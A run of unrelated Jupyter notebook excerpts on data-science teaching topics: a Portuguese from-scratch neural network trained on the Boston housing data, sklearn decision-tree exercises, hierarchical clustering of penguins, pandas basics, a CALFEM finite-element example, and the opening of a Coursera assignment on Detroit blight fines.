self.nodes_entrada[0].valor.shape[0] # Salva o output computado para o backward pass. self.diff = y - a self.valor = np.mean(self.diff**2) def backward(self): """ Calcula o gradiente do custo. """ self.gradientes[self.nodes_entrada[0]] = (2 / self.m) * self.diff self.gradientes[self.nodes_entrada[1]] = (-2 / self.m) * self.diff def topological_sort(feed_dict): """ Classifica os nós em ordem topológica usando o Algoritmo de Kahn.     `Feed_dict`: um dicionário em que a chave é um nó `Input` e o valor é o respectivo feed de valor para esse nó.     Retorna uma lista de nós ordenados. """ input_nodes = [n for n in feed_dict.keys()] G = {} nodes = [n for n in input_nodes] while len(nodes) > 0: n = nodes.pop(0) if n not in G: G[n] = {'in': set(), 'out': set()} for m in n.nodes_saida: if m not in G: G[m] = {'in': set(), 'out': set()} G[n]['out'].add(m) G[m]['in'].add(n) nodes.append(m) L = [] S = set(input_nodes) while len(S) > 0: n = S.pop() if isinstance(n, Input): n.valor = feed_dict[n] L.append(n) for m in n.nodes_saida: G[n]['out'].remove(m) G[m]['in'].remove(n) if len(G[m]['in']) == 0: S.add(m) return L def forward_and_backward(graph): """ Executa uma passagem para a frente e uma passagem para trás através de uma lista de nós ordenados.      Argumentos:          `Graph`: O resultado de `topological_sort`. """ # Forward pass for n in graph: n.forward() # Backward pass # O valor negativo no slice permite fazer uma cópia da mesma lista na ordem inversa. for n in graph[::-1]: n.backward() def sgd_update(params, learning_rate = 1e-2): """ Atualiza o valor de cada parâmetro treinável com o SGD. Argumentos:          `Trainables`: uma lista de nós `Input` que representam pesos / bias.          `Learning_rate`: a taxa de aprendizado. """ # Executa o SGD # # Loop sobre todos os parâmetros for t in params: # Alterar o valor do parâmetro, subtraindo a taxa de aprendizado # multiplicado pela parte do custo em relação a esse parâmetro partial = t.gradientes[t] t.valor -= learning_rate * partialExecutando o Grafo http://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_boston.htmlimport numpy as np from sklearn.datasets import load_boston from sklearn.utils import shuffle, resample import matplotlib.pyplot as plt %matplotlib inline # Carrega os dados X_, y_ = load_boston(return_X_y=True) print(f'variaveis preditoras/esplicativas tem o shape de: {X_.shape}.') # Normaliza os dados X_ = (X_ - np.mean(X_, axis = 0)) / np.std(X_, axis = 0) # Número de features e número de neurônios n_features = X_.shape[1] n_hidden = 10 # Define valores randômicos para inicializar pesos e bias W1_ = np.random.randn(n_features, n_hidden) b1_ = np.zeros(n_hidden) W2_ = np.random.randn(n_hidden, 1) b2_ = np.zeros(1)Antes de seguir, quem consegue explicar o que está ocorrendo acima?# Rede Neural # Prestem atenção no que faz a classe Input assim como as carácteristicas de Herança e sobrecarga X, y = Input(), Input() W1, b1 = Input(), Input() W2, b2 = Input(), Input() l1 = Linear(X, W1, b1) s1 = Sigmoid(l1) l2 = Linear(s1, W2, b2) cost = MSE(y, l2) # Define o feed_dict feed_dict = { X: X_, y: y_, W1: W1_, b1: b1_, W2: W2_, b2: b2_ } # Número de epochs (altere esse valor para ver as mudanças no resultado) epochs = 1000 # Número total de exemplos m = X_.shape[0] # Batch size batch_size = 11 steps_per_epoch = m // batch_size # Define o grafo computacional graph = topological_sort(feed_dict) #for j in graph: # print(j.__class__.__name__) # Valores que serão aprendidos pela rede params = [W1, b1, W2, b2] # Número total de exemplos print("Número Total de Exemplos = {}".format(m)) cost = [] # Treinamento do modelo for i in range(epochs): loss = 0 for j in range(steps_per_epoch): # Passo 1 - Testa aleatoriamente um lote de exemplos X_batch, y_batch = resample(X_, y_, n_samples = batch_size) # Reset dos valores de X e y X.valor = X_batch y.valor = y_batch # Passo 2 - Forward e Backpropagation forward_and_backward(graph) # Passo 3 - Otimização por SGD sgd_update(params) loss += graph[-1].valor cost.append(loss/steps_per_epoch) print("Epoch: {}, Custo: {:.3f}".format(i+1, loss/steps_per_epoch)) plt.plot(range(1, len(cost)+1), cost, marker = 'o') plt.title('Gráfico de loss x epoc') plt.xlabel('Iterações') plt.ylabel('Sum Squared Error - SSE') plt.show()Meeting Observable> Jupyter is jealous I read an article by on [JavaScript and the next decade of data programming](http://benschmidt.org/post/2020-01-15/2020-01-15-webgpu/) and it featured something called 'Observable'. An interactive notebook-like environment for JS that has some pretty compelling features. Today I had a bit of a play with it and I am hooked - I really like the way they handle cell execution flow, and I am so excited to use this to share data viz and interactive experiences with others without the need for a web server, colab, python install etc. And it is so useful being able to export a specific cell to use wherever - in fact this notebook will just display a few iframes from my Observable notebook. [Check it out for the full code and some extra thoughts.](https://observablehq.com/@johnowhitaker/meeting-observable)#hide from IPython.display import display, HTML display(HTML(""" """)) display(HTML(""" """))Dependenciesimport os import re from datetime import datetimeGet posts listFolder_list = ['../Dessert','../Main_Course'] Post_list = [] for folder in Folder_list: for root, directories, files in os.walk(folder, topdown=False): for name in files: print(os.path.join(root, name)) if '.md' in name: Post_list.append(os.path.join(root, name)) Post_listUpdate reading timefor post in Post_list: f = open(post, 'r') htmlmarkdown="".join(f.readlines()) match = re.search(r'\d{4}-\d{2}-\d{2}', post.split('/')[-1]) date = datetime.strptime(match.group(), '%Y-%m-%d').date() htmlmarkdown = re.sub(r"发布于\d+-\d+-\d+,阅读时间", "发布于{},阅读时间".format(date), htmlmarkdown) chinese_word = re.findall(r'[\u4E00-\u9FFF]',htmlmarkdown) print(len(chinese_word)) htmlmarkdown = re.sub(r"阅读时间:约\d+分钟", "阅读时间:约{}分钟".format(int(len(chinese_word)/200)), htmlmarkdown) with open(post, 'w') as new_file: new_file.write(htmlmarkdown)2465 2179 3119 1916 962 1224 749 862 1164 1280 1093 2537day14: Decision Tree Classifier Basics Objectives* Learn how to use *probabilistic* decision tree binary classifiers in sklearn* * Call `fit` to train them on provided labeled dataset* * Call `predict_proba` to get probabilistic predictions (will give you multiple columns, one per possible label)* * * use `predict_proba(...)[:,1]` to get just the probabilities of the positive class* * Call `predict` to get hard binary decisions* See tradeoffs as a function of different hyperparameters* * max_depth* * min_samples_per_leaf* * We'll reuse the same examples from our experience with Logistic Regression and kNN to provide some common ground Outline* [Part 1: Binary classification with Decision Trees on 1-dim. toy example](part1)* [Part 2: Inspecting learned tree structure on toy example](part2)* [Part 3: Visualizing decision boundaries of Decision Trees on 2-dim. features](part3)* [Part 4 (Bonus): Inspecting learned tree structure on 2-dim. example](part4)We expect you'll get through part 3 during this class period. Takeaways* Decision trees produce piecewise constant decision boundaries (as function of features)* * These boundaries are *axis aligned*, meaning they are always parallel or perpendicular to one of the "elementary" directions in the feature space (along x1 axis, along x2 axis, etc)import numpy as np import sklearn.tree # import plotting libraries import matplotlib import matplotlib.pyplot as plt %matplotlib inline plt.style.use('seaborn') # pretty matplotlib plots import seaborn as sns sns.set('notebook', font_scale=1.25, style='whitegrid')Setting up a simple classification task with 1-dim features Let's think about a classification task where:Each input is just scalar $x$ between -1 and +1.The "true" label assignment function is as follows:$$y(x) = \begin{cases} 1 & \text{if} ~ x > 0 \\0 & \text{otherwise}\end{cases}$$The true labeling process also has some noise: after assigning a label with the above function, each example has a ~15% chance of the opposite label. This noise makes our classification interesting. The "best case" error rate is about ~15%. Make training set for 1-dim. toy example# We generated this training set for you. N = 12 x_tr_N = np.asarray([ -0.975, -0.825, -0.603, -0.378, -0.284, -0.102, 0.169, 0.311, 0.431, 0.663, 0.795, 0.976]) x_tr_N1 = x_tr_N.reshape((N,1)) # need an (N,1) shaped array for later use with sklearn y_tr_N = np.asarray([0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1]) plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5));Make validation set for 1-d toy exampledef make_dataset(n_examples=10, seed=101, flip_fraction=0.15): N = int(n_examples) prng = np.random.RandomState(seed) # Make x values between -1 and 1, roughly evenly spaced x_N = np.linspace(-1, 1, N) + 0.05 * prng.randn(N) # Make y values such that broadly, the true function says: # y_n = 1 if x_n > 0 # y_n = 0 otherwise y_N = np.asarray(x_N > 0, dtype=np.int32) # flip a small percentage of the values chosen_ids = prng.permutation(np.arange(N))[:int(np.floor(flip_fraction * N))] y_N[chosen_ids] = 1 - y_N[chosen_ids] return x_N.reshape((N,1)), y_N M = 100 x_va_M1, y_va_M = make_dataset(n_examples=M, seed=201) plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_va_M1, y_va_M - 0.01, 'rs', label='validation set'); # add small vertical offset so you can see both sets plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5));Part 1: Train a decision tree model for F=1 dataSee the docs for DecisionTreeClassifier here: Here, we'll fit a decision tree probabilistic classifier to the above 1-dim. feature dataset.# We'll use max_depth = 2 for now. You could select it like any hyperparameter on validation data. tree_depth2 = sklearn.tree.DecisionTreeClassifier(max_depth=2) tree_depth2.fit(x_tr_N1, y_tr_N)Make predictions using our tree using `predict_proba`Remember, `predict_proba()` returns the probabilities of ALL possible labels: 0 and 1There will be two columns, one for each label.The first column is for the class corresponding to binary label 0.The second column is for the class corresponding to binary label 1.yproba_N2 = tree_depth2.predict_proba(x_tr_N1) print("yproba_N2") print("Shape: " + str(yproba_N2.shape)) print(yproba_N2)yproba_N2 Shape: (12, 2) [[0.5 0.5 ] [0.5 0.5 ] [0.5 0.5 ] [0.5 0.5 ] [1. 0. ] [1. 0. ] [0. 1. ] [0. 1. ] [0. 1. ] [0.66666667 0.33333333] [0.66666667 0.33333333] [0.66666667 0.33333333]]Exercise 1a: Obtain a 1D array of the predicted probas for *positive* class only** Input **: 2D array `yproba_N2` from above, with shape (N, 2)** Desired output **: We want a 1D array with shape (N,) whos entries contain the probabilities that the training examples are in the positive class.yproba1_N = np.zeros(N) # TODO fix meSetup : Prepare for a plot over dense grid of inputs# Create dense grid of L input examples from -1.5 to 1.5 # so we can better understand the learned predictions L = 101 dense_x_L1 = np.linspace(-1.5, 1.5, L).reshape((L,1)) # Apply our trained tree to make predictions along this grid # Uses the syntax [:,1] to access the column with index 1 (so we only get the probas for positive class) yproba1_dense_L = tree_depth2.predict_proba(dense_x_L1)[:,1]Plot: predicted probabilities vs. feature value at DEPTH = 2We can see that the predicted probabilities from Decision Trees are *piecewise constant*.plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_tr_N, yproba1_N, 'bd', label='Probability predictions on training set'); plt.plot(dense_x_L1, yproba1_dense_L, 'b-', label='Probability evaluated at dense grid') plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.title("Decision Tree with depth=2")Discussion 2a: Why does this plot have piecewise constant probability predictions? TODO write your answer here. Try again with max_depth = 1 Decision Tree# Call sklearn.tree.DecisionTreeClassifier(...) with max_depth hyperparameter set to 1 tree_depth1 = sklearn.tree.DecisionTreeClassifier(max_depth=1) tree_depth1.fit(x_tr_N1, y_tr_N) depth1_yproba1_N = tree_depth1.predict_proba(x_tr_N1)[:,1] depth1_dense_yproba1_L = tree_depth1.predict_proba(dense_x_L1)[:,1] plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_tr_N, depth1_yproba1_N, 'bd', label='Probability predictions on training set'); plt.plot(dense_x_L1, depth1_dense_yproba1_L, 'b-', label='Probability evaluated at dense grid') plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.title("Decision Tree with depth=1");Exercise 1c: Try again with a max_depth=6 Decision Treetree_depth6 = None # TODO call sklearn.tree.DecisionTreeClassifier(...) with max_depth hyperparameter set to 6 # Train the classifier, by calling fit using provided arrays x_tr_N1, y_tr_N tree_depth6 # TODO fixme depth6_yproba1_N = 0.5 * np.ones(N) # TODO call predict_proba on the training set, keep only the positive class probas depth6_yproba1_dense_L = 0.5 * np.ones(L) # TODO call predict_proba on the dense input array, keep only positive class probas plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_tr_N, depth6_yproba1_N, 'bd', label='Probability predictions on training set'); plt.plot(dense_x_L1, depth6_yproba1_dense_L, 'b-', label='Probability evaluated at dense grid') plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.title("Decision Tree with depth=6")Part 2: What is stored inside a trained instance of DecisionTreeClassifierdef pretty_print_tree(tree_clf): # Has an attribute called tree_ which stores the entire # tree structure and allows access to low level attributes. The binary tree # tree_ is represented as a number of parallel arrays. The i-th element of each # array holds information about the node `i`. Node 0 is the tree's root. NOTE: # Some of the arrays only apply to either leaves or split nodes, resp. In this # case the values of nodes of the other type are arbitrary! # # Among those arrays, we have: # - left_child, id of the left child of the node # - right_child, id of the right child of the node # - feature, feature used for splitting the node # - threshold, threshold value at the node # - value, counts of each class observed in training examples that reach this node # Using those arrays, we can parse the tree structure: n_nodes = tree_clf.tree_.node_count children_left = tree_clf.tree_.children_left children_right = tree_clf.tree_.children_right feature = tree_clf.tree_.feature threshold = tree_clf.tree_.threshold # The tree structure can be traversed to compute various properties # such as: # * the depth of each node # * whether or not it is a leaf. node_depth = np.zeros(shape=n_nodes, dtype=np.int64) is_leaves = np.zeros(shape=n_nodes, dtype=bool) stack = [(0, -1)] # seed is the root node id and its parent depth while len(stack) > 0: node_id, parent_depth = stack.pop() node_depth[node_id] = parent_depth + 1 # If we have a test node if (children_left[node_id] != children_right[node_id]): stack.append((children_left[node_id], parent_depth + 1)) stack.append((children_right[node_id], parent_depth + 1)) else: is_leaves[node_id] = True print("The binary tree structure has %s nodes." % n_nodes) print("The tree structure is:") for i in range(n_nodes): if is_leaves[i]: n_class0 = tree_clf.tree_.value[i,0,0] n_class1 = tree_clf.tree_.value[i,0,1] proba1 = n_class1 / (n_class1 + n_class0) print("%snode=%s is a leaf node with p(y=1 | this leaf) = %.3f (%d training examples)" % ( node_depth[i] * "\t", i, proba1, n_class0 + n_class1)) else: print("%snode=%s is a test node: go to node %s if X[:, %s] <= %.2f else to " "node %s." % (node_depth[i] * "\t", i, children_left[i], feature[i], threshold[i], children_right[i], )) print()Display tree with depth 1pretty_print_tree(tree_depth1)The binary tree structure has 3 nodes. The tree structure is: node=0 is a test node: go to node 1 if X[:, 0] <= 0.03 else to node 2. node=1 is a leaf node with p(y=1 | this leaf) = 0.333 (6 training examples) node=2 is a leaf node with p(y=1 | this leaf) = 0.667 (6 training examples)Discussion 2a: Does this structure above align with the depth=1 visualization in Part 1?* Does the number of training examples assigned to each leaf make sense?* Does the probability predicted by each leaf make sense? Display tree with depth 2pretty_print_tree(tree_depth2)The binary tree structure has 7 nodes. The tree structure is: node=0 is a test node: go to node 1 if X[:, 0] <= 0.03 else to node 4. node=1 is a test node: go to node 2 if X[:, 0] <= -0.33 else to node 3. node=2 is a leaf node with p(y=1 | this leaf) = 0.500 (4 training examples) node=3 is a leaf node with p(y=1 | this leaf) = 0.000 (2 training examples) node=4 is a test node: go to node 5 if X[:, 0] <= 0.55 else to node 6. node=5 is a leaf node with p(y=1 | this leaf) = 1.000 (3 training examples) node=6 is a leaf node with p(y=1 | this leaf) = 0.333 (3 training examples)Discussion 2b: Does this structure above align with the depth=2 visualization in Part 1? TODO discuss Display tree with depth 6pretty_print_tree(tree_depth6)Setup for Part 3 Define simple dataset of points in 2D spaceDon't worry about the details of this setup.Just try to understand the plots below.def create_2d_dataset(N=100, noise_stddev=0.1, random_state=0): random_state = np.random.RandomState(int(random_state)) mA_2 = np.asarray([1, 0]) covA_22 = np.square(noise_stddev) * np.eye(2) mB_2 = np.asarray([0, 0]) covB_22 = np.square(noise_stddev) * np.eye(2) mC_2 = np.asarray([0, 1]) covC_22 = np.square(noise_stddev) * np.eye(2) # Draw data from 3 "Gaussian" blobs xA_N2 = random_state.multivariate_normal(mA_2, covA_22, size=N) xB_N2 = random_state.multivariate_normal(mB_2, covB_22, size=N) xC_N2 = random_state.multivariate_normal(mC_2, covC_22, size=N) x_N2 = np.vstack([xA_N2, xB_N2, xC_N2]) y_N = np.hstack([np.ones(xA_N2.shape[0]), np.zeros(xB_N2.shape[0]), np.ones(xC_N2.shape[0])]) return x_N2, y_NCreate the dataset with 100 points per classx_N2, y_N = create_2d_dataset(N=100, noise_stddev=0.3)Define function to plot data as scatterpoints in 2ddef plot_pretty_data_colored_by_labels(x_N2, y_N): plt.plot(x_N2[y_N==0,0], x_N2[y_N==0,1], color='r', marker='x', linestyle='', markersize=5, mew=2, label='y=0'); plt.plot(x_N2[y_N==1,0], x_N2[y_N==1,1], color='b', marker='+', linestyle='', markersize=8, mew=2, label='y=1'); plot_pretty_data_colored_by_labels(x_N2, y_N); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.xlabel('x_1'); plt.ylabel('x_2'); plt.gca().set_aspect(1.0); plt.xticks([0, 1, 2]); plt.yticks([0, 1, 2]); plt.title("Binary classification example with 2-dim feature");Define function to make pretty plots of predicted probability color fieldsYou don't need to understand this in detail. Just a utility function.def plot_pretty_probabilities_for_clf( clf, do_show_colorbar=False, x1_ticks=np.asarray([0, 2, 4]), x2_ticks=np.asarray([0, 2, 4]), c_levels=np.linspace(0, 1, 100), c_ticks=np.asarray([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]), x1_grid=np.linspace(-1, 2.3, 100), x2_grid=np.linspace(-1, 2.3, 100)): cur_ax = plt.gca() G = x1_grid.size H = x2_grid.size # Get regular grid of G x H points, where each point is an (x1, x2) location x1_GH, x2_GH = np.meshgrid(x1_grid, x2_grid) # Combine the x1 and x2 values into one array # Flattened into M = G x H rows # Each row of x_M2 is a 2D vector [x_m1, x_m2] x_M2 = np.hstack([x1_GH.flatten()[:,np.newaxis], x2_GH.flatten()[:,np.newaxis]]) # Predict proba for each point in the flattened grid yproba1_M = clf.predict_proba(x_M2)[:,1] # Reshape the M probas into the GxH 2D field yproba1_GH = np.reshape(yproba1_M, x1_GH.shape) cmap = plt.cm.RdYlBu my_contourf_h = plt.contourf(x1_GH, x2_GH, yproba1_GH, levels=c_levels, vmin=0, vmax=1.0, cmap=cmap) plt.xticks(x1_ticks, x1_ticks); plt.yticks(x2_ticks, x2_ticks); if do_show_colorbar: left, bottom, width, height = plt.gca().get_position().bounds cax = plt.gcf().add_axes([left+1.1*width, bottom, 0.03, height]) plt.colorbar(my_contourf_h, orientation='vertical', cax=cax, ticks=c_ticks); plt.sca(cur_ax);Define function to visualize hard decisions made as thresholdYou don't need to understand this in detail. Just a utility function.def plot_pretty_decision_boundaries_for_clf( clf, threshold=0.5, do_show_colorbar=False, x1_ticks=np.asarray([0, 2, 4]), x2_ticks=np.asarray([0, 2, 4]), c_levels=np.linspace(0, 1, 100), c_ticks=np.asarray([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]), x1_grid=np.linspace(-1, 2.3, 100), x2_grid=np.linspace(-1, 2.3, 100)): cur_ax = plt.gca() G = x1_grid.size H = x2_grid.size # Get regular grid of G x H points, where each point is an (x1, x2) location x1_GH, x2_GH = np.meshgrid(x1_grid, x2_grid) # Combine the x1 and x2 values into one array # Flattened into M = G x H rows # Each row of x_M2 is a 2D vector [x_m1, x_m2] x_M2 = np.hstack([x1_GH.flatten()[:,np.newaxis], x2_GH.flatten()[:,np.newaxis]]) # Predict proba for each point in the flattened grid yproba1_M = clf.predict_proba(x_M2)[:,1] yhat_M = yproba1_M >= threshold # Reshape the M probas into the GxH 2D field yhat_GH = np.reshape(yhat_M, x1_GH.shape) cmap = plt.cm.RdYlBu my_contourf_h = plt.contourf(x1_GH, x2_GH, yhat_GH, levels=c_levels, vmin=0, vmax=1.0, cmap=cmap) plt.xticks(x1_ticks, x1_ticks); plt.yticks(x2_ticks, x2_ticks); if do_show_colorbar: left, bottom, width, height = plt.gca().get_position().bounds cax = plt.gcf().add_axes([left+1.1*width, bottom, 0.03, height]) plt.colorbar(my_contourf_h, orientation='vertical', cax=cax, ticks=c_ticks); plt.sca(cur_ax);Part 3: Visualization of DecisionTree predictions as we vary max_depthGenerally, max depth is one of the key hyperparameters that controls model complexity. Figure: DecisionTree predicted proba (colors) over 2D plane of x1, x2max_depth_grid = [1, 2, 4, 8, 16] trees_by_depth = dict() ncols = len(max_depth_grid) fig_h, axes = plt.subplots(nrows=1, ncols=ncols, figsize=(5 * ncols, 5)) is_last = False for ii, max_depth in enumerate(max_depth_grid): if ii == ncols - 1: is_last = True plt.sca(axes[ii]) clf = sklearn.tree.DecisionTreeClassifier(max_depth=max_depth) clf.fit(x_N2, y_N) auroc = sklearn.metrics.roc_auc_score(y_N, clf.predict_proba(x_N2)[:,1]) plot_pretty_probabilities_for_clf(clf, do_show_colorbar=is_last); plot_pretty_data_colored_by_labels(x_N2, y_N); plt.title("max_depth=%d\ntrain_AUROC %.3f" % (max_depth, auroc)) # Store for later trees_by_depth[max_depth] = clfKNN: hard binary decisions (colors) over 2D plane of (x1, x2)Using Threshold: 0.5max_depth_grid = [1, 2, 4, 8, 16] ncols = len(max_depth_grid) fig_h, axes = plt.subplots(nrows=1, ncols=ncols, figsize=(5 * ncols, 5)) is_last = False for ii, max_depth in enumerate(max_depth_grid): if ii == ncols - 1: is_last = True plt.sca(axes[ii]) clf = sklearn.tree.DecisionTreeClassifier(max_depth=max_depth) clf.fit(x_N2, y_N) err_rate = np.mean(np.logical_xor(y_N, clf.predict(x_N2))) plot_pretty_decision_boundaries_for_clf(clf, do_show_colorbar=is_last); plot_pretty_data_colored_by_labels(x_N2, y_N); plt.title("max_depth=%d\ntrain_error_rate %.3f" % (max_depth, err_rate))Discussion 3a: At what depth does the classifier get zero training error on the training set? Would we expect this on the validation set? Discussion 3b: How could you select the maximum depth hyperparameter on a new dataset?* What search strategies would you consider?* What minimum and maximum candidate values would you consider? Part 4 (Bonus) Inspect the learned tree structure on the F=2 problem above Remember, above we stored the learned trees inside our trees_by_depth dict.We'll now inspect each one to get a sense of how these models vary from simple to complex. DEPTH 1pretty_print_tree(trees_by_depth[1])DEPTH 2pretty_print_tree(trees_by_depth[2])DEPTH 4pretty_print_tree(trees_by_depth[4])HIERARCHICAL CLUSTERING**File:** hierarchical.ipynb**Course:** Data Science Foundations: Data Mining in Python IMPORT LIBRARIESimport pandas as pd # For dataframes import matplotlib.pyplot as plt # For plotting data import seaborn as sns # For plotting data from sklearn.cluster import AgglomerativeClustering # For clustering from scipy.cluster.hierarchy import dendrogram, linkage # For clustering and visualizationLOAD AND PREPARE DATARead the `penguins.csv` file from the `data` directory into variable `df`. Select a random sample of 75 cases of the dataset for easy visualization. Keep all features in variable `df` and store the class variable in `y`.# Reads the .csv file into variable df df = pd.read_csv('data/penguins.csv') # Selects a random sample of 75 cases df = df.sample(n=75, random_state=1) # Separates the class variable in y y = df.y # Removes the y column from df df = df.drop('y', axis=1) # Displays the first 5 rows of df df.head()HIERARCHICAL CLUSTERING In this demonstration, we'll use `SciPy` to perform hierarchical clustering. (Another common choice is `scikit-learn`.)The `scipy.cluster.hierarchy` package contains two functions, i.e., `linkage()` and `dendogram()` for hierarchical clustering. The `linkage()` function performs agglomerative clustering and the `dendogram()` function displays the clusters. Various `linkage` methods are possible. Here we'll use the `ward` linkage method that merges clusters so that variance of the clusters is minimized. Other linkage options are:- `average`- `single` - `complete` The `linkage()` function returns a linkage matrix with information about clusters. This matrix can be viewed using the `dendogram()` function. The code below performs clustering using the `euclidean` metric and displays the clusters.# Performs agglomerative clustering using `ward` linkage and `euclidean` metric hc = linkage(df, method='ward', metric='euclidean') # Sets the figure size fig = plt.figure(figsize=(15, 15)) # Displays the dendogram # The lambda function sets the labels of each leaf dn = dendrogram( hc, leaf_label_func=lambda id: y.values[id], leaf_font_size=10)PandasOffical website: [https://pandas.pydata.org/pandas-docs/stable/index.html](https://pandas.pydata.org/pandas-docs/stable/index.html)""" Import libraries and load CSV files into Pandas's dataframes. Read in a tiny portion of the table """ import pandas as pd # df = pd.DataFrame.from_csv("../datasets/top_50_spotify.csv") # df = pd.read_csv("../datasets/top_50_spotify.csv", encoding="ISO-8859-1", nrows=10, usecols=["Energy", "Genre", "Track.Name", "Artist.Name"]) df = pd.read_csv("../datasets/top_50_spotify.csv", encoding="ISO-8859-1", nrows=10) df1.1 Attributes""" Return a tuple representing the dimensionality of the DataFrame. """ df.shape """ Return an int representing the number of elements in this object. """ df.size """ The column labels of the DataFrame. """ df.columns """ Return the dtypes in the DataFrame. """ df.dtypes """ Return an int representing the number of axes / array dimensions. """ df.ndim1.2 Indexing and iteration""" Return the first n rows. Default is 5 """ df.head() # df.head(2) """ Return the last n rows. Default is 5 """ df.tail() # df.tail(2) """ Access a group of rows and columns by label(s) or a boolean array. """ df.loc[:] # df.loc[:2] # df.loc[2:5] # df.loc[47:] # df.loc[:2, ["Energy", "Artist.Name"]] # df.loc[data["Energy"] < 40] # df.loc[data["Energy"] < 40, ["Energy", "Artist.Name"]] """ Purely integer-location based indexing for selection by position. """ df.iloc[:] # df.iloc[:2] # df.iloc[2:5] # df.iloc[47:] # IndexError: .iloc requires numeric indexers, got ['Energy' 'Artist.Name'] ## df.iloc[:2, ["Energy", "Artist.Name"]] # df.iloc[:2, 2:6] """ Iterator over (column name, Series) pairs. """ for label, content in df.items(): print('Label:', label) print('Content: ', content, sep='\n')Label: Unnamed: 0 Content: 0 1 1 2 2 3 3 4 4 5 5 6 6 7 7 8 8 9 9 10 Name: Unnamed: 0, dtype: int64 Label: Track.Name Content: 0 Señorita 1 China 2 boyfriend (with Social House) 3 Beautiful People (feat. Khalid) 4 Goodbyes (Feat. Young Thug) 5 I Don't Care (with ) 6 Ransom 7 How Do You Sleep? 8 Old Town Road - Remix 9 bad guy Name: Track.Name, dtype: object Label: Artist.Name Content: 0 1 2 3 4 Post Malone 5 6 7 8 9 Name: Artist.Name, dtype: object Label: Genre Content: 0 canadian pop 1 reggaeton flow 2 dance pop 3 pop 4 dfw rap 5 pop 6 trap mu[...]1.3 Descriptive stats""" Generate descriptive statistics that summarize the central tendency, dispersion and shape of a dataset’s distribution, excluding NaN values. """ df.describe() """ Compute pairwise correlation of columns, excluding NA/null values. """ df.corr() """ Return the mean of the values for the requested axis. """ df.mean() """ Return the median of the values for the requested axis. """ df.median() """ Count non-NA cells for each column or row. """ df.count()1.4 Serialization""" Print a concise summary of a DataFrame. """ df.info() RangeIndex: 10 entries, 0 to 9 Data columns (total 14 columns): Unnamed: 0 10 non-null int64 Track.Name 10 non-null object Artist.Name 10 non-null object Genre 10 non-null object Beats.Per.Minute 10 non-null int64 Energy 10 non-null int64 Danceability 10 non-null int64 Loudness..dB.. 10 non-null int64 Liveness 10 non-null int64 Valence. 10 non-null int64 Length. 10 non-null int64 Acousticness.. 10 non-null int64 Speechiness. 10 non-null int64 Popularity 10 non-null int64 dtypes: int64(11), object(3) memory usage: 1.2+ KBExample 12The use case from the user manual. The example does not contain anything that is not covered in the previous examples.import calfem.core as cfc import calfem.vis_mpl as cfv import calfem.utils as cfu import calfem.shapes as cfs import calfem.solver as cfslv import numpy as np %matplotlib notebookGeneral problem variablesrect = cfs.Rectangle(5.0, 1.0, element_type=2, dofs_per_node=1, max_area=0.08) rect.t = 1 rect.ep = [rect.t, 1] rect.D = np.diag([1.7, 1.7])Create meshmesh = cfs.ShapeMesh(rect)Solve problemsolver = cfslv.Flow2DSolver(mesh) solver.addBC(rect.left_id, 0.0) solver.addBC(rect.right_id, 120.0) #solver.addForceTotal(rect.topId, -10e5, dimension=2) results = solver.execute()Visualise results Geometrycfv.figure() cfv.draw_geometry(rect.geometry(), title="Geometry")Meshcfv.figure() cfv.draw_mesh(mesh.coords, mesh.edof, rect.dofs_per_node, rect.element_type, filled=True, title="Mesh") #Draws the mesh.Nodal valuescfv.figure() cfv.draw_nodal_values_shaded(results.a, mesh.coords, mesh.edof) plt.colorbar()---_You are currently looking at **version 1.1** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-machine-learning/resources/bANLa) course resource._--- Assignment 4 - Understanding and Predicting Property Maintenance FinesThis assignment is based on a data challenge from the Michigan Data Science Team ([MDST](http://midas.umich.edu/mdst/)). The Michigan Data Science Team ([MDST](http://midas.umich.edu/mdst/)) and the Michigan Student Symposium for Interdisciplinary Statistical Sciences ([MSSISS](https://sites.lsa.umich.edu/mssiss/)) have partnered with the City of Detroit to help solve one of the most pressing problems facing Detroit - blight. [Blight violations](http://www.detroitmi.gov/How-Do-I/Report/Blight-Complaint-FAQs) are issued by the city to individuals who allow their properties to remain in a deteriorated condition. Every year, the city of Detroit issues millions of dollars in fines to residents and every year, many of these fines remain unpaid. Enforcing unpaid blight fines is a costly and tedious process, so the city wants to know: how can we increase blight ticket compliance?The first step in answering this question is understanding when and why a resident might fail to comply with a blight ticket. This is where predictive modeling comes in. For this assignment, your task is to predict whether a given blight ticket will be paid on time.All data for this assignment has been provided to us through the [Detroit Open Data Portal](https://data.detroitmi.gov/). **Only the data already included in your Coursera directory can be used for training the model for this assignment.** Nonetheless, we encourage you to look into data from other Detroit datasets to help inform feature creation and model selection. We recommend taking a look at the following related datasets:* [Building Permits](https://data.detroitmi.gov/Property-Parcels/Building-Permits/xw2a-a7tf)* [Trades Permits](https://data.detroitmi.gov/Property-Parcels/Trades-Permits/635b-dsgv)* [Improve Detroit: Submitted Issues](https://data.detroitmi.gov/Government/Improve-Detroit-Submitted-Issues/fwz3-w3yn)* [DPD: Citizen Complaints](https://data.detroitmi.gov/Public-Safety/DPD-Citizen-Complaints-2016/kahe-efs3)* [Parcel Map](https://data.detroitmi.gov/Property-Parcels/Parcel-Map/fxkw-udwf)___We provide you with two data files for use in training and validating your models: train.csv and test.csv. Each row in these two files corresponds to a single blight ticket, and includes information about when, why, and to whom each ticket was issued. The target variable is 